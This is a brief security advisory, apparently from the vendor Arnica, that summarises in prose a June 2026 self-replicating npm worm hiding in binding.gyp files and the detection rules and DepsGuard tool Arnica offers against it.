binding.gyp npm Supply Chain Attack: What Arnica Customers Need to Know (June 2026)

A self-replicating worm exploiting a vulnerability in the npm registry is spreading by bypassing traditional security measures and embedding itself within the binding.gyp file, which is typically unmonitored by security tools. This worm, first identified by StepSecurity on June 3, 2026, evades detection by avoiding the typical package.json lifecycle hooks and instead uses a three-stage payload that steals credentials, injects itself into CI/CD pipelines, and poisons packages. It leverages stolen GitHub tokens to insert backdoor files and potentially influence code generation, posing a significant risk to software supply chains. The worm targets a wide array of developer credentials and exfiltrates them through encrypted dangling commits, complicating detection. As the worm spreads, it modifies GitHub Actions workflows to ensure ongoing execution, compromising numerous packages and maintainers. In response, security firm Arnica has deployed detection rules to identify compromised packages and offers tools like DepsGuard to help developers and security teams protect against such threats by implementing preventive measures, emphasizing the need for proactive defense in software development environments.